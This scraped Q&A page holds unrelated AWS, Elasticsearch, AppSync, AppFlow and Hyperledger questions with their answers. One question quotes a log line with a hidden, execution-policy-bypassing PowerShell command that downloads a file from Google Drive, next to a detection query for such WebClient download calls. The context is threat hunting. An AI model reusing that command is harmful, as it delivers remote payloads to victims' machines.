Scripting in AWS elasticsearch - amazon-web-services

I read online about scripting in aws elacticsearch service. It said that AWS ES doesn't support dynamic scripting so I am writing aggregations using scripts stored in my disk. I wrote the following query
{
"query":{
"match_all":{}
},
"aggs":{
"inBoundRecieved":{
"scripted_metric":{
"init_script":{
"file": "init.groovy"
},
"map_script": {
"file": "map.groovy"
},
"combine_script": {
"file":"comb.groovy"
},
"params":{
"field":"call_direction"
},
"reduce_script": {
"file": "red.groovy"
}
}
}
}
}
But I keep getting this error.
Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script]
I have searched a lot online but couldn't find a good solution.
Full Error ->
{
"error" : "SearchPhaseExecutionException[Failed to execute phase [query], all shards failed; shardFailures {[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][0]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][0]: query[ConstantScore(*:*)], from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init.groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\": { \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][1]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/ search[phase/query]]]; nested: SearchParseException[[plivoredshift][1]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init.groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\": \"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][1]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][2]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init. groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script]. ]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][3]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][3]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init. groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][3]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].
"status":400
}
Here are my scripts
init.groovy
_agg['transactions'] = []
map.groovy
if (doc['call_direction']=="inbound" {_agg.transactions.add(1)} else {_agg.transactions.add(0)}
comb.groovy
inBoundRecieved=0; for( t in _agg.transactions) {inBoundRecieved+=t}; return inBoundRecieved
red.groovy
inBoundRecieved=0; for( a in _aggs) {inBoundRecieved += a}; return inBoundRecieved
I have been following this tutorial from the ElacticSearch website

Looks like scripting can be used in AWS elasticsearch service for version 5 now:
http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-resources.html
https://forums.aws.amazon.com/thread.jspa?threadID=217896&start=25&tstart=0

Related

Appflow upsert error : ID does not exist in the destination connector

Creating a appflow from S3 bucket to salesforce through CDK with upsert option.
Using existing connection to From S3 to Salesforce -
new appflow.CfnConnectorProfile(this, 'Connector',{
"connectionMode": "Public",
"connectorProfileName":"connection_name",
"connectorType":"Salesforce"
})
Destination flow Code -
new appflow.CfnFlow(this, 'Flow', {
destinationFlowConfigList: [
{
"connectorProfileName": "connection_name",
"connectorType": "Salesforce",
"destinationConnectorProperties": {
"salesforce": {
"errorHandlingConfig": {
"bucketName": "bucket-name",
"bucketPrefix": "subfolder",
},
"idFieldNames": [
"ID"
],
"object": "object_name",
"writeOperationType": "UPSERT"
}
}
}
],
..... other props ....
}
tasks: [
{
"taskType":"Filter",
"sourceFields": [
"ID",
"Some other fields",
...
],
"connectorOperator": {
"salesforce": "PROJECTION"
}
},
{
"taskType":"Map",
"sourceFields": [
"ID"
],
"taskProperties": [
{
"key":"SOURCE_DATA_TYPE",
"value":"Text"
},
{
"key":"DESTINATION_DATA_TYPE",
"value":"Text"
}
],
"destinationField": "ID",
"connectorOperator": {
"salesforce":"PROJECTION"
}
},
{
.... some other mapping fields.....
}
But the problem is - "Invalid request provided: AWS::AppFlow::FlowCreate Flow request failed: [ID does not exist in the destination conne ctor]
According to the error, how to fix the problem with the existing connector which results in ID does not exist in the destination connector
PS: ID is defined in the flow code. But still it is saying ID is not found.
I think your last connector operator should be:
"connectorOperator": {
"salesforce":"NO_OP"
}
instead of:
"connectorOperator": {
"salesforce":"PROJECTION"
}
since you are mapping the field ID into itself without any transformations whatsoever.

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

"type mismatch error, expected type LIST" for querying a one-to-many relationship in AppSync

The schema:
type User {
id: ID!
createdCurricula: [Curriculum]
}
type Curriculum {
id: ID!
title: String!
creator: User!
}
The resolver to query all curricula of a given user:
{
"version" : "2017-02-28",
"operation" : "Query",
"query" : {
## Provide a query expression. **
"expression": "userId = :userId",
"expressionValues" : {
":userId" : {
"S" : "${context.source.id}"
}
}
},
"index": "userIdIndex",
"limit": #if(${context.arguments.limit}) ${context.arguments.limit} #else 20 #end,
"nextToken": #if(${context.arguments.nextToken}) "${context.arguments.nextToken}" #else null #end
}
The response map:
{
"items": $util.toJson($context.result.items),
"nextToken": #if(${context.result.nextToken}) "${context.result.nextToken}" #else null #end
}
The query:
query {
getUser(id: "0b6af629-6009-4f4d-a52f-67aef7b42f43") {
id
createdCurricula {
title
}
}
}
The error:
{
"data": {
"getUser": {
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null
}
},
"errors": [
{
"path": [
"getUser",
"createdCurricula"
],
"locations": null,
"message": "Can't resolve value (/getUser/createdCurricula) : type mismatch error, expected type LIST"
}
]
}
The CurriculumTable has a global secondary index titled userIdIndex, which has userId as the partition key.
If I change the response map to this:
$util.toJson($context.result.items)
The output is the following:
{
"data": {
"getUser": {
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null
}
},
"errors": [
{
"path": [
"getUser",
"createdCurricula"
],
"errorType": "MappingTemplate",
"locations": [
{
"line": 4,
"column": 5
}
],
"message": "Unable to convert \n{\n [{\"id\":\"87897987\",\"title\":\"Test Curriculum\",\"userId\":\"0b6af629-6009-4f4d-a52f-67aef7b42f43\"}],\n} to class java.lang.Object."
}
]
}
If I take that string and run it through a console.log in my frontend app, I get:
{
[{"id":"2","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"},{"id":"1","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"}]
}
That's clearly an object. How do I make it... not an object, so that AppSync properly reads it as a list?
SOLUTION
My response map had a set of curly braces around it. I'm pretty sure that was placed there in the generator by Amazon. Removing them fixed it.
I think I'm not seeing the complete view of your schema, I was expecting something like:
schema {
query: Query
}
Where Query is RootQuery, in fact you didn't share us your Query definition. Assuming you have the right Query definition. The main problem is in your response template.
> "items": $util.toJson($context.result.items)
This means that you are passing a collection named: *"items"* to Graphql query engine. And you are referring this collection as "createdCurricula". So solve this issue your response-mapping-template is the right place to fix. How? just replace the above line with the following.
"createdCurricula": $util.toJson($context.result.items),
Please the main thing to note here is, the mapping template is a bridge between your datasources and qraphql, feel free to make any computation, or name mapping but don't forget that object names in that response json are the one should match in schema/query definition.
Thanks.
Musema
change to result type to $util.toJson($ctx.result.data.posts)
The exception msg says that it expected a type list.
Looking at:
{
[{"id":"2","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"},{"id":"1","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"}]
}
I don't see that createdCurricula is a LIST.
What is currently in DDB is:
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null

How to decrypt an encrypted payload in hyperledger?

I am currently using Hyperledger Fabric. I am using the REST API to make GET request as so:
curl 172.18.0.3:7050/chain/blocks/31
And the output I am getting back is :
{
"transactions": [
{
"type": 2,
"chaincodeID": "BMBQHHg2y0RnadYEaZZT8icjMvZbDPjkn5mFb+clFORxJqz8qsMs/QlalCT+A3msuc59KYM5sbZyhM3OeSplTWo91WAHTUgqIKVrm1gUzsouBIqLNvpqgimN36+s0ywF0Rx4gn27RmQYBbB+877Nh+w7A8Ezz92T1MgHcmzfRgVaDmiN0ga+jAfufNYglmeM4ZSysmSsz6xJtrcD5mTmHXZtvtw6uGCI1TCOMBaWTpLhNHfM2/5EB5jatdMjDi1GAlaXkDWcLgGjScL1yZpWcntz/N0cT90r6i9ycXZ0kk9wodBq2cFutDTdkl8S90kzd0gXig==",
"payload":"BBYZD6S/hRILcf21zVbhMAhA+qLQvAq+KvOBuXOknPCAMjas2LI9f42AKG6r+uWP71LYEkbo1XXANuDmukZjDsFGltzoIfq+Mry5n/CNXzXgiVLX0J7z08kGfEfw2vnywgmVFX4UtKPpl8pMTmRxJWn5Q0HY1pFnA6ZaXluoLRf7f17Ko4SPahi19k2NszcJ0SHE7xRllfLXZJxaOlT2J56nqjTBKTJ86bdqn6AdQXHA6Px7yz5XpgJhccyecaLS4sYcsrqHoOlO+kk+bw5Q6qnkHfIIhLXCEgHxKoT00L8I8B2luO1RlmQd4mNfXb7GrLOJXvCNPrcpSEmQDByEGwn1j3Zy0lilwKVaNYTPNThMwQ==",
"txid": "72bd2ab7-f769-49c9-a754-c7be0c481cf0",
"timestamp": {
"seconds": 1496062124,
"nanos": 474977395
},
"confidentialityLevel": 1,
"confidentialityProtocolVersion": "1.2",
"nonce": "2YgU+0WYPuTKGsKkT1hx7McOURPTIRgG",
"toValidators": "BJWJi5aSycSaJBaLIciUxlhZNyRsW6es2pO7ljUmqxP2SLzgUJtDtAeG8S5SMq+RQ9iX9m8+HIUocrD2J1MBTJaxPWcs/dYFNp1zi8k1ogbEuIQJDe/Gb0mbYVoBqGgFjofiE2lrZTO+RBVmUBQkAoybloOMUSfMawpOPTt/cIeNBq3M+t6gbTSl0ZVs5ofITWtonwhG8PNnlZwEmTLkC7evX1ImivMqo47ONxHXJlbbtjf+pL5kaqU5DrXWiv2L6Wt0xc11od4rbotnAQP2w2dqKTy2fj4ON6qCBp8i+t2FRi/iO0INJpI0aDjdkVCR",
"cert": "MIICUjCCAfigAwIBAgIRAJOBK8HG3E/Pmw8fZwL4iuswCgYIKoZIzj0EAwMwMTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0h5cGVybGVkZ2VyMQwwCgYDVQQDEwN0Y2EwHhcNMTcwNTI5MTEyNzQwWhcNMTcwODI3MTEyNzQwWjBFMQswCQYDVQQGEwJVUzEUMBIGA1UEChMLSHlwZXJsZWRnZXIxIDAeBgNVBAMTF1RyYW5zYWN0aW9uIENlcnRpZmljYXRlMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE6QVLJ48eCVlS1S8/BiSTU1XiWR0tZ6NGF3OZr306sTcgG/nYtcjx6/yJNwDgdYz5Boi7sA2QWUcqUkWfIPNWPKOB3DCB2TAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/BAIwADANBgNVHQ4EBgQEAQIDBDAPBgNVHSMECDAGgAQBAgMEME0GBioDBAUGBwEB/wRArYyx9l4zJL4TbxDHuGZBsJ545Jsph/D/Q/FgMTTtxPh93B+LV6AI1tyFVHWiKNS4GgvDVlmgfwFuMAca+/PaujBKBgYqAwQFBggEQPEdAS1h/9LJJmqriV+42k0bL+ghGFbHa5GiEAitiMjlduiwgfelPK/rbAq0a6NrnPXCEYe1aWCSqyqsEfHGBoIwCgYIKoZIzj0EAwMDSAAwRQIhAOidYaESZ3xyZBTgcBOm3zyXvGb4YCCt7I7+M0gZF4xzAiAgYuCf7FPGx3fnJdABlZjszA1pR6jaPtIOQN2ndfAFZA==",
"signature": "MEUCIQCVBtfjk3yzwfOFyOojH5tynq3HrG7dFN9URXB5C6kYDAIgLPcwJBAIVlD1I4dxzczfxmywlZn1ZMSvL2djioWgqFQ="
}
],
"stateHash": "9KEsiBp4t/VZyETXMASSYtuPuf8JowktCSbX7daPt69uqDzrJvifrPIXpI5N1kOayoq6H0afM8zN/WZpWsesHQ==",
"previousBlockHash": "v6Fo6SARD0xdE0B/jvIq22kgV5uLAKhTwLjrA4YRBskWcZOjECFbNgzlwFQhEmbar1zcAbcZVo9eo/3tx2y68g==",
"consensusMetadata": "CCA=",
"nonHashData": {
"localLedgerCommitTimestamp": {
"seconds": 1496062125,
"nanos": 496018341
},
"chaincodeEvents": [
{
},
{
}
]
}
}
So I had performed a invoke to
transfer 10 from a to b.
And i got this payload.
The payload is encrypted as the
CORE_SECURITY_ENABLED=true and
CORE_SECURITY_PRIVACY=true
I know we have to use the certificate to decrypt the payload and then might be use base64 decoding to get the exact payload back.
But my question is what are the exact function calls or exact steps involved in doing so ?

Using Elastic Search Geo Functionality To Find Most Common Locations?

I have a geojson file containing a list of locations each with a longitude, latitude and timestamp. Note the longitudes and latitudes are multiplied by 10000000.
{
"locations" : [ {
"timestampMs" : "1461820561530",
"latitudeE7" : -378107308,
"longitudeE7" : 1449654070,
"accuracy" : 35,
"junk_i_want_to_save_but_ignore" : [ { .. } ]
}, {
"timestampMs" : "1461820455813",
"latitudeE7" : -378107279,
"longitudeE7" : 1449673809,
"accuracy" : 33
}, {
"timestampMs" : "1461820281089",
"latitudeE7" : -378105184,
"longitudeE7" : 1449254023,
"accuracy" : 35
}, {
"timestampMs" : "1461820155814",
"latitudeE7" : -378177434,
"longitudeE7" : 1429653949,
"accuracy" : 34
}
..
Many of these locations will be the same physical location (e.g. the user's home) but obviously the longitude and latitudes may not be exactly the same.
I would like to use Elastic Search and it's Geo functionality to produce a ranked list of most common locations where locations are deemed to be the same if they are within, say, 100m of each other?
For each common location I'd also like the list of all timestamps they were at that location if possible!
I'd very much appreciate a sample query to get me started!
Many thanks in advance.
In order to make it work you need to modify your mapping like this:
PUT /locations
{
"mappings": {
"location": {
"properties": {
"location": {
"type": "geo_point"
},
"timestampMs": {
"type": "long"
},
"accuracy": {
"type": "long"
}
}
}
}
}
Then, when you index your documents, you need to divide the latitude and longitude by 10000000, and index like this:
PUT /locations/location/1
{
"timestampMs": "1461820561530",
"location": {
"lat": -37.8103308,
"lon": 14.4967407
},
"accuracy": 35
}
Finally, your search query below...
POST /locations/location/_search
{
"aggregations": {
"zoomedInView": {
"filter": {
"geo_bounding_box": {
"location": {
"top_left": "-37, 14",
"bottom_right": "-38, 15"
}
}
},
"aggregations": {
"zoom1": {
"geohash_grid": {
"field": "location",
"precision": 6
},
"aggs": {
"ts": {
"date_histogram": {
"field": "timestampMs",
"interval": "15m",
"format": "DDD yyyy-MM-dd HH:mm"
}
}
}
}
}
}
}
}
...will yield the following result:
{
"aggregations": {
"zoomedInView": {
"doc_count": 1,
"zoom1": {
"buckets": [
{
"key": "k362cu",
"doc_count": 1,
"ts": {
"buckets": [
{
"key_as_string": "Thu 2016-04-28 05:15",
"key": 1461820500000,
"doc_count": 1
}
]
}
}
]
}
}
}
}
UPDATE
According to our discussion, here is a solution that could work for you. Using Logstash, you can call your API and retrieve the big JSON document (using the http_poller input), extract/transform all locations and sink them to Elasticsearch (with the elasticsearch output) very easily.
Here is how it goes in order to format each event as depicted in my initial answer.
Using http_poller you can retrieve the JSON locations (note that I've set the polling interval to 1 day, but you can change that to some other value, or simply run Logstash manually each time you want to retrieve the locations)
Then we split the locations array into individual events
Then we divide the latitude/longitude fields by 10,000,000 to get proper coordinates
We also need to clean it up a bit by moving and removing some fields
Finally, we just send each event to Elasticsearch
Logstash configuration locations.conf:
input {
http_poller {
urls => {
get_locations => {
method => get
url => "http://your_api.com/locations.json"
headers => {
Accept => "application/json"
}
}
}
request_timeout => 60
interval => 86400000
codec => "json"
}
}
filter {
split {
field => "locations"
}
ruby {
code => "
event['location'] = {
'lat' => event['locations']['latitudeE7'] / 10000000.0,
'lon' => event['locations']['longitudeE7'] / 10000000.0
}
"
}
mutate {
add_field => {
"timestampMs" => "%{[locations][timestampMs]}"
"accuracy" => "%{[locations][accuracy]}"
"junk_i_want_to_save_but_ignore" => "%{[locations][junk_i_want_to_save_but_ignore]}"
}
remove_field => [
"locations", "#timestamp", "#version"
]
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
index => "locations"
document_type => "location"
}
}
You can then run with the following command:
bin/logstash -f locations.conf
When that has run, you can launch your search query and you should get what you expect.